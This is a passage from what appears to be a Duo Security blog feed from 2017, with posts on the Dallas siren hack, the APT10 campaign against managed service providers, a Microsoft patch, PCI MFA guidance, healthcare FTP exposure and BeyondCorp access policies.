The latter isn’t as insane as it might sound - on December 31st, 1982 in Tulsa, Oklahoma, a group of burglars cut through 50,000 phone lines in a very small room inside a telephone substation. They used a chainsaw to cut the lines. This triggered hundreds of alarm systems at area businesses with police trying to respond, and in all the confusions, the burglars broke into a drug company warehouse and stole $1.3 million dollars worth of narcotics (roughly worth $3.3 million in 2017 dollars). Yes, this actually happened, however I kind of doubt it for our Dallas scenario. As a movie fan, of course I am hoping for some jewelry store robbery or museum art heist, but odds are it was either the insider theory or the “measure the results” theory. A disgruntled insider is a simple enough scenario, but the “measure the results” theory might warrant some thoughts.

Testing Real-Life Incident Response

One thing an attacker might want to do, particularly if they’re part of a terrorist group or a state-sponsored attack, would be to perform a “dry run” and see how a panic-inducing scenario might affect not just the local population, but measure response times and how other services (911, police, fire department, etc.) were impacted.

For example, it took a bit before 911 was overwhelmed and wait times became life-threatening for those with a real emergency. Knowing that could allow an attacker with a future plan to prepare accordingly. The same would go for the response from social media. A lot of people were more annoyed than anything else, but for some, they were legitimately freaked out.

For a scenario to freak out more people, the attacker now knows a bit better how this scenario worked and might think of additional activities that could further induce panic. This doesn’t mean Dallas might be targeted again, it could mean another city might be targeted with Dallas being used as a testbed. We, of course, have no evidence of this scenario being the case, but it’s not outright impossible that this was the motivation.

So who do I think did it? My money is on a disgruntled insider. However I don’t want to dismiss the other scenarios outright, as there is a non-zero chance it is one of those.

Lessons Learned

From the looks of innovation and the advent of IoT moving into industrial control systems such as OWS, there are probably going to be more events like this that occur.

I think the best lesson we can learn is one of planning for emergencies. What is the worse thing that could happen to your organization? Does your incident response and disaster planning cover all kinds of threats and all kinds of strange scenarios? Sitting down and having regular tabletop exercises for the entire incident response and disaster recovery team are important when preparing for the real things. Throwing in some movie plot or spy ring scenarios are kind of fun, but these extreme scenarios will also show you some of the cracks in your response and recovery plans that ordinary or mundane scenarios might not. A part of the those tabletop exercises should include everything you can think of, from minor to major. Will it affect money? Your customer’s private data? Be a PR nightmare? Upper management at an off-site planning retreat on the ski slopes and unreachable when the unthinkable happens? Cover it all.

Dallas OEM said in the press conference and in press interviews that they had not planned for this at all. Remarkably they did an excellent job of at least getting the sirens off, and now have a plan to get things back online with methods in place to prevent the hack from happening again. And even if they never catch who did this or learn why, it is still a valuable lesson for all of us.

Have a disaster plan, test it regularly, and don’t forget that George Clooney is just wandering around out there planning something awful. Be prepared!

<![CDATA[Hackers Target Managed Service Providers to Breach Client Networks]]> thu@duosecurity.com(Thu Pham) https://duo.com/blog/hackers-target-managed-service-providers-to-breach-client-networks https://duo.com/blog/hackers-target-managed-service-providers-to-breach-client-networks Industry News Wed, 05 Apr 2017 09:00:00 -0400

One of the largest sustained global cyber espionage campaigns is targeting managed IT service providers (MSPs) in order to gain access to MSP customer networks, known as Operation Cloud Hopper, according to a report by PricewaterhouseCoopers (PwC) and BAE Systems.

The threat actor group is known as APT10, said to be based in China. In operation since 2009, they’ve been known to steal a high volume of intellectual property and other sensitive data from MSP networks. More recently, the group has significantly increased the scale and scope of their campaigns to target many different industries, which can be attributed to the compromise of MSP networks and their large cache of diverse customers.

Leveraging Unfettered Cloud & Hosting Provider Access

Since MSPs are often responsible for remotely managing their customer’s IT and user systems, they typically have direct, privileged access to their clients’ networks. If they’re cloud or hosting providers, they may also house a large amount of customer data - sometimes sensitive or confidential - on their own internal infrastructure, according to the PwC report. Targeting just one MSP can give an attacker access to a large number of different organizations.

According to the report, several MSPs have been breached, including those that provide enterprise services or cloud hosting. The industries targeted include retail, technology, energy, industrial manufacturing, engineering and construction, business and professional services, pharmaceuticals and the public sector.

There has also been a separate custom malware campaign targeting Japan-based organizations. APT10 has posed as different public sector entities like the Ministry of Foreign Affairs, the Liberal Democratic Party of Japan and others to gain access to commercial companies and government agencies.

Same Old Story: Phishing, Exploits and Stolen Credentials

Their main attack method is via phishing emails sent with an executable attachment. To trick users, the hacking group has registered a number of spoofed domains to send emails from, including religious and academic organizations, like salvationarmy.org. After a user has clicked on a link to download the attachment that contains an exploit payload, the threat actor can leverage known vulnerabilities to gain access to the target’s network.

According to the report, the hacking group continued to use MSP credentials to gain further credentials with the help of credential theft tools like mimikatz, which targets Windows computers to steal password hashes and dump plaintext passwords, and can effectively evade antivirus software. Most of the stolen MSP credentials have given attackers administrator or domain administrator privileges. Additionally, the attackers rely on systems with shared access and credentials to easily hop between MSP networks and their clients.

Security Tips for MSPs

To protect their networks and their clients’ networks and data, MSPs should:

  • Never share credentials between different users. Create unique user accounts and credentials, and restrict access to the least amount required to do the job in order to reduce the scope of what an attacker can access if they manage to steal or compromise one account.
  • Use two-factor authentication to protect every account against remote unauthorized access, including both administrative accounts and accounts to systems that seem noncritical (attackers have been observed targeting low-profile systems to avoid detection).
  • Don’t rely on antivirus software alone to detect a breach. Consider taking more proactive security measures, like conducting internal phishing simulations in order to assess risk and educate users.
  • Invest in endpoint security. Get insight into your users’ devices and see who is authenticating into your network.
  • Protect against exploit kits leveraging known vulnerabilities. A good endpoint security solution gives you the ability to create policies that block access from risky devices attempting to authenticate into to your network and systems.

Download the The Essential Guide to Securing Remote Access to learn more about security concerns with third-party providers and cloud access.

<![CDATA[Microsoft Patch: Update to Fix Actively Exploited Vulnerabilities]]> thu@duosecurity.com(Thu Pham) https://duo.com/blog/microsoft-patch-update-to-fix-actively-exploited-vulnerabilities https://duo.com/blog/microsoft-patch-update-to-fix-actively-exploited-vulnerabilities Industry News Tue, 04 Apr 2017 09:00:00 -0400

Recently, Microsoft patched a vulnerability that could be used in phishing attacks to direct users to malicious websites, known as CVE-2017-0022. This is one of three that have been exploited by attackers in the wild since last year.

The security update is available in March’s Patch Tuesday, which included two months of updates and 18 security bulletins - 9 of which were rated as critical.

The CVE-2017-0022 is a Microsoft XML Core Services Information Disclosure vulnerability that could be used by an attacker hosting a spoofed website that could allow the attacker to test for the presence of files on disk. The attacker would have to convince a user to click a link in an email message that would direct them to the malicious website.

According to Trend Micro, the vulnerability was used in the AdGholas malvertising campaign and packaged into the Neutrino exploit kit. In addition to using the vulnerability in phishing attacks and to access information on files found on the user’s system, the attacker could also detect if the system was using particular security software, such as malware analysis tools.

How does a user get exploited by this vulnerability? First, they visit a website using a web browser that serves up a malicious advertisement. The browser is then redirected to a malicious landing page that hosts the exploit kit. After checking the user’s system for security software, the kit launches its malware if the tools aren’t detected. To test your organization’s risk of getting phished, launch an internal phishing campaign.

Attackers will often target non-critical vulnerabilities (such as CVE-2017-0022, considered medium severity) as part of a strategic approach - these type of vulnerabilities will often be relegated to getting fixed at a later date by software vendors than the more critical, attention-grabbing vulnerabilities. That means attackers have more time to exploit them, according to Trend Micro.

Other critical vulnerabilities patched in March by Microsoft affect the web browser, Internet Explorer (IE). The most severe could allow for remote code execution if a user visits a malicious website via IE, giving an attacker the same user rights as the user, according to the Microsoft Security Bulletin.

This is why it’s imperative for organizations to update their software regularly and on a timely basis to stay protected against the latest vulnerabilities that may be leveraged via phishing attempts. With Duo’s Device Insight, you can check every endpoint that logs into your company’s applications for out-of-date software. Plus, you can enforce device access policies that require the latest versions by either warning users if they need to update, or blocking them until they do, by using Duo’s Endpoint Remediation.

Duo Beyond gives you even more control and insight - differentiating between managed (corporate-owned) and unmanaged (employee-owned) devices accessing your services. To protect against unknown and potentially risky devices, you can leverage Trusted Endpoints to block access by unmanaged devices.

See the latest enterprise endpoint trends in Duo’s 2016 Trusted Access Report: Microsoft Edition.

<![CDATA[Navigating New PCI DSS 3.2 Guidelines for MFA With Duo]]> wnather@duo.com(Wendy Nather) https://duo.com/blog/navigating-new-pci-dss-32-guidelines-for-mfa-with-duo https://duo.com/blog/navigating-new-pci-dss-32-guidelines-for-mfa-with-duo Industry News Mon, 03 Apr 2017 09:00:00 -0400

When you’re trying to parlay a multi-factor authentication (MFA) product into a solution that complies with current requirements and stays ahead of future ones, it’s hard to tell which way the ship is sailing — especially when you run up against parts that are more what you’d call guidelines than actual rules. PCI DSS 3.2 went into effect in October 2016, with requirement 8.3.1 (expanded use of MFA) coming into effect on February 1, 2018. In the meantime, the PCI Council has come out with an MFA Supplement that sets forth some guidelines that may possibly be incorporated into the standard at some point in the future.

Now, Duo helps meet these guidelines, with features such as:

  • Policies to prevent authentication login from specific locations, networks or IP addresses
  • Strong authentication with Security Element (SE) or U2F
  • An easy to use out-of-band authentication factor (Duo Push, based on asymmetric keys)

Your Compass: Complete Authentication Visibility

However, there’s one guideline in the supplement that we know from experience is likely to create problems for both the user and the support staff: “no prior knowledge of the success or failure of any factor should be provided to the individual until all factors have been presented.”

Remember that PCI requirements — and indeed, the whole standard — are designed to mitigate risk scenarios around credit card theft. In this case, one of the security threats PCI is addressing is an attacker trying to guess (or brute force) an account’s username and password. It’s a common tactic, and many security assessors and penetration testers disapprove of the notion of letting anyone know what they got wrong in a login sequence, just in case it’s an attacker.

But anyone who has had to staff a help desk knows how frustrating it is for the user, who may not even be sure of the username, much less the password. The conventional assumption that a user always knows and remembers their username dates back to a time in which everyone only had one or two accounts, usually just for work.

Today, by virtue of being business partners, reporting entities, and online consumers, people have literally hundreds of accounts, many of them predating password managers by a decade. Some of these accounts may not be used more than once a year, if that often. It’s completely normal for them to struggle with remembering usernames and passwords, particularly when those usernames were assigned in an enterprise context.

The practice of concealing details on which part of an authentication process failed is more commonly known in the industry as “security by obscurity.” And in this case, it’s not necessary, since there are other measures you can take to mitigate the risk of password guessing or brute forcing attempts. Most systems today enforce a lockout (either temporary or permanent) after a certain number of incorrect attempts; giving more feedback will help the user figure out what they’re doing wrong and help them stay within that limit.

Some retailers, who deal with account takeover (ATO) attacks on a regular basis, block attempts from known malicious addresses before they can even start rattling the doorknobs. Even if an attacker manages to use the right username and password, Duo’s push notification gives the details of the secondary request, allowing the original user to indicate that the request is fraudulent and deny it.

Don’t Conflate ‘Feedback’ With ‘Bypass’

The next part of this PCI guideline reads: “If an unauthorized user can deduce the validity of any individual authentication factor, the overall authentication process becomes a collection of subsequent, single-factor authentication steps, even if a different factor is used for each step.”

We don’t agree with this arbitrary division of a multi-factor authentication process into “steps” just because the user receives feedback on the primary authentication success or failure. That’s independent of the other possible risk: that the MFA process could be interrupted and the user could bypass the next factor in the sequence. Giving feedback and being bypassed are two different issues, and shouldn’t be conflated in the one guideline.

Usable, Strong and Informed Security

At Duo, we believe in providing strong security with usability. We provide several robust measures to mitigate brute-force attempts, in addition to other security risks, such as man-in-the-middle attacks, phishing and more. Duo provides IT admins with detailed reports for logging and auditing purposes of all authentication attempts, as well as APIs to export that data into a SIEM or other system to monitor anomalous activity (see, for example, our Splunk Connector).

The bottom line is that enterprises have to make tradeoffs every day between security and usability. They should be able to compare their own support costs of troubleshooting an MFA sequence, and in some cases potentially losing customers, against a risk scenario that they may already be able to mitigate with other controls.

What can organizations do to address these guidelines going forward?

  • As always, get your QSA’s (Qualified Security Assessor) view of the issues. Look at all your MFA process flows, particularly where you’re rolling out the technology for the first time. Your application security testing (such as for Requirement 6.5.8) should include checks to ensure that a successful primary authentication doesn’t allow the user to pivot and gain access before the secondary authentication takes place.
  • Make sure you have mitigating controls on your primary authentication to thwart password guessing and brute-force attempts, such as limits on the number of attempts within a short period of time. (Some account takeover attacks now spread out their attempts over days and different IP addresses, so monitoring is critical.)
  • If you have help desk statistics on calls from users who are having trouble authenticating, use those to estimate the overall support cost today, and how it might change if you had to remove or change feedback messages.
  • If you’re in a position to give feedback to the PCI Council, share your opinion!

For more guidance, check out A Guide to Stronger Security in PCI DSS 3.2.

<![CDATA[Secure All the Things With Duo]]> ccherrie@duosecurity.com(Chrysta Cherrie) https://duo.com/blog/secure-all-the-things-with-duo https://duo.com/blog/secure-all-the-things-with-duo Press and Events Fri, 31 Mar 2017 16:00:00 -0400

Something we hear from Duo customers over and over again is, “Your app is so easy to use! I wish it could work for even more things in my life.”

The truth is*, now it can! We heard your feedback and are excited to announce new enhancements to Duo Push that support all the things. Securing your work applications with two-factor authentication is great, but it's just the beginning. With the one-tap ease of Duo Push, the possibilities for integration with your day-to-day life are only limited by your imagination, and the implications are staggering.

“Using 2FA for literally everything ever has proven to secure 100% of all the things.”
– Jordan Wright, Duo Labs Senior R&D Engineer

Some ideas to get you started:

  • Rev up your car alarm. Think the Club is the forefront of automotive security? Get with the times and lock down your car with 2FA, using your mobile phone like a key.
  • Protect your intellectual property. Tired of sticky-fingered folks getting their mitts on your Penguin Classics? Two factor sure beats a flimsy physical lock.
  • Revolutionize the restroom. Make your home even smarter, securing every appliance and gadget imaginable with the ease of a remote control.

To see how these fresh features for Duo Push can transform your life, watch our new video:


Best of all, when you enable 2FA for all the things, you activate peace of mind. With breaches affecting organizations and individuals more than ever, how sure are you really that no one is surveilling you through your microwave or accessing your files without your permission? To stop 100% of hackers, real or imagined, use two-factor authentication.

“According to the Verizon Data Breach Investigations Report, 63% of breaches involved stolen or weak credentials. You can eliminate the risk of account takeover — and enable everyday life — with the easiest two-factor authentication method: Duo Push.”
– Olabode Anise, Duo Labs R&D Engineer

Are you ready to secure all the things? Push for all the things is available in limited beta. Tweet at us at @duosec to learn more.

*Psych! You can do a lot with Duo Push, but we're just funnin' ahead of April Fool's Day.

<![CDATA[Attackers Actively Targeting Healthcare's FTP Servers]]> thu@duosecurity.com(Thu Pham) https://duo.com/blog/attackers-actively-targeting-healthcares-ftp-servers https://duo.com/blog/attackers-actively-targeting-healthcares-ftp-servers Industry News Thu, 30 Mar 2017 09:00:00 -0400

The FBI has issued a private industry notification to the healthcare industry, warning organizations that attackers are actively targeting FTP (File Transfer Protocol) servers to access protected health information.

These FTP servers are connected to medical and dental facilities, giving attackers access to regulated and sensitive protected healthcare data, according to the FBI. Criminals could also configure FTP servers to allow for write access, giving them a tool to store or launch malicious attacks.

FTP allows for basic, unencrypted and anonymous public file transfers, using cleartext passwords for authentication, according to SSH.com. While the legacy protocol has been replaced by SFTP and SSH, the implementation is often forgotten by organizations as it is deployed years ago, but never disabled or replaced with a more secure protocol.

The FBI cited research from 2015 about over one million FTP servers that were configured to allow for anonymous access to data stored on the servers, according to a University of Michigan report. Last September, Softpedia reported that nearly 800,000 FTP servers available online via an IPv4 address were accessible online without the need for any credentials.

Exposing databases of private patient information can lead to HIPAA violations which come with hefty government fines and data breach costs.

At this year’s RSA Conference, it was reported that the estimated annual costs of data breaches affecting the healthcare industry has topped $6 billion, with an average cost of $2.1 million to resolve breaches, based on a Ponemon Institute study on healthcare data privacy and security.

In the talk about electronic healthcare record (EHR) security, a diagram about where EHRs are vulnerable highlighted external and legacy systems connected to EHR data centers as likely attack vectors, for good reason.

EHR Vulnerabilities Diagram

Any legacy software can introduce a point of weakness for healthcare organizations. In the 2016 Duo Trusted Access Report, we found that the healthcare industry is even more behind than other industries on average when it comes to updating their Windows operating systems. Only 14% of Windows endpoints in healthcare were running the latest version, Windows 10.

We also found that the healthcare industry had twice as many endpoints running Windows XP, a 16-year-old version of the OS that no longer receives security updates.

Updating legacy software can sometimes be difficult, if not impossible, due to application dependencies and interconnected medical devices. However, the costs and impact of a data breach can be far greater than those associated with updating, patching and replacing old systems with more secure ones.

<![CDATA[BeyondCorp: Creating Access Policies]]> wnather@duo.com(Wendy Nather) https://duo.com/blog/beyondcorp-creating-access-policies https://duo.com/blog/beyondcorp-creating-access-policies Industry News Wed, 29 Mar 2017 09:00:00 -0400

In our first blog post introducing the BeyondCorp concept, we discussed what organizations should think about when trying it for themselves. The steps may not happen in sequential order, but they are generally:

In this post, we’ll talk about creating access policies. Your access proxy takes on the role of enforcing access to corporate resources, regardless of whether they’re outside or inside your traditional perimeter. Enforcement strategy is one way we express risk tolerance; rightsizing those policies depends on factors such as sensitivity, threat, user community, regulatory requirements, and any number of other things. And enforcing policies consistently for both sides of the firewall is a key tenet of the BeyondCorp model.

More Than A Multipass

Your access policies are much more flexible than a stop-or-go approach. Like a multi-use tool, you can use them to bludgeon, nudge, slice, or tap. Here are some of the types of access policies to consider.

  • Warning - strongly recommending or requiring action at some point in the future.
  • Blocking - the heaviest of the policies, preventing access entirely.
  • Logging - taking note of a condition or event.
  • Mitigating - loosening or reversing the effects of another policy based on certain risk scenarios.
  • Responding - taking short-term actions to react to a particular situation.


You can use warning policies to drive behavior. A warning is a reminder with a little weight behind it: if you don’t do what the reminder says, sooner or later you will suffer a consequence. For example, most organizations put a grace period in their policies to give users time to update their software before they’re either forcibly upgraded, or they’re blocked until they catch up.

Using Duo Beyond as an example of the BeyondCorp model, a simple policy that results in a warning might look like this:

Access Policy to Warn Users

So if a new version of a particular browser comes out, your users have one month to upgrade to it, or be blocked after that grace period has expired.

If your warning policy has no consequence attached to it — that is, the user may override or ignore the warning every time — then it’s little more than an irritating flag that pops up in the middle of that user’s workflow. And if the warning is about something that the user can’t take action on, it’s even more frustrating. If a system can’t be updated because of some other dependency, then the warning serves no purpose and just trains the user to ignore the irritant. When it comes to access policies, make sure that you’re asking for a concrete action that’s within the recipient’s capability, and be prepared to take an enforcement action within a reasonable time period based on your risk estimates.


A policy for blocking is best suited to situations where you don’t have wiggle room. For example, Duo customers such as KAYAK want to block access to critical applications from non-managed personal devices. Either the device is corporate-owned and “blessed,” or it isn’t. In Duo Beyond, the policy looks like this:

Trusted Endpoints by Duo Security

Many organizations are interested in blocking based on geolocation. If you are quite sure that you never need to allow access from certain regions, a general block will work, but that’s not always an option if you do business with them or you have users who travel there. Bear in mind that blocking based on IP address or a derived geolocation won’t necessarily protect you from a determined attacker who can spoof those things, but in general, it can work as a filtering mechanism for large segments of the population who should not even be trying to authenticate to your applications.


There are some policies that are used to mitigate the effects of other policies. Multi-factor authentication is an important security control, but some users don’t like having to use it every time they need to use a resource. An organization may decide that after the initial authentication to a system, the risk is low enough to delay re-authenticating for a certain period of time. One example of this is “remembering” a user or device, or both. For Duo, you would set a policy like this one:

Remembered Devices by Duo Security

Another possible mitigating policy is to skip the second authentication factor for devices on particular trusted network segments. However, once you begin trusting something more when it’s on the “inside” of your network perimeter, you’re in danger of undermining what BeyondCorp is all about: the idea that you shouldn’t trust the inside any more than the outside. So use these “loosening” policies with caution.


Organizations can also put temporary policies in place to respond to a particular event. If a critical vulnerability is announced for a plugin, for example, and you know your users are at risk because the vulnerability is already being exploited, then you may want to block users until they get the patched version installed. In other words, you would shrink the time window or grace period of a regular policy for just this one situation.

Other response-type policies could include placing geolocation or network restrictions on a device that someone can’t find — until they either find it again, or determine that it was really lost or stolen. If they find it where they expected, they can use it again right away, but if someone else tries to use it from a different location, they won’t be able to access corporate data with it. The same idea applies to an employee who is leaving; while they work out the notice period, their access policies might be tightened so that they can’t access applications that contain large stores of sensitive data.

Managing Exceptions To Policies

(also known as: “Negative. I am a Meat Popsicle.”)

For every policy, there is an equal and opposite exception. There may be good reasons why a set of endpoints can’t be fully updated: they don’t have regular access to enough network bandwidth; they’re dependent on one application that requires a certified stack to operate; it’s too politically sensitive to block your CEO even if she rooted her own phone. You never allow traffic through an anonymized proxy, except that one time when an employee is traveling abroad and can’t access some home resources any other way.

Strictly speaking, a firewall is an exception in itself: you know it’s risky to connect to the Internet, but you do it anyway because there are strong business reasons to do so. The firewall embodies and manages those exceptions (“Okay, but only for web applications …”). For your users, have a workflow process ready to receive exception requests, and for yourself, be ready to record and approve them with reminders to follow up if the policy exceptions are only temporary.

Another purpose for adding policy exceptions is to introduce change over time. You may have stricter policies in place for a smaller user group to try them out before deploying them to the rest of the population. Exceptions can also help to troubleshoot all sorts of problems if you suspect they’re being caused by an access policy: for the one user, you create an exception for each policy in turn that you know is being applied to them, until the guilty one surfaces (or all of them are ruled out).

From The Big To The Small

Access policies can be used not only at the network and application levels, but also at the device and behavior levels. You can start by blocking access to whole categories of outliers (such as banning any use of an insecure browser), and then work your way towards requiring better endpoint hygiene, such as screen locks. In the case of Duo Mobile, you can require your users to validate their two-factor authentication (2FA) confirmation with a fingerprint on iOS, so that even if an attacker has access to the unlocked phone, they still can’t finish logging into the application.

The most important thing is to carve away at the devices, software, sources and behaviors you know you don’t want to allow, thereby reducing your exposure to attacks. Changing the security lifestyle of an organization takes dedicated work, but once you have the controls fit more closely to where they belong — the users, their devices, and the applications — then you’ll be addressing the gaps in today’s traditional security paradigm and moving Beyond it.

For more information on how to create access policies within Duo, check out this Duo Policy Guide.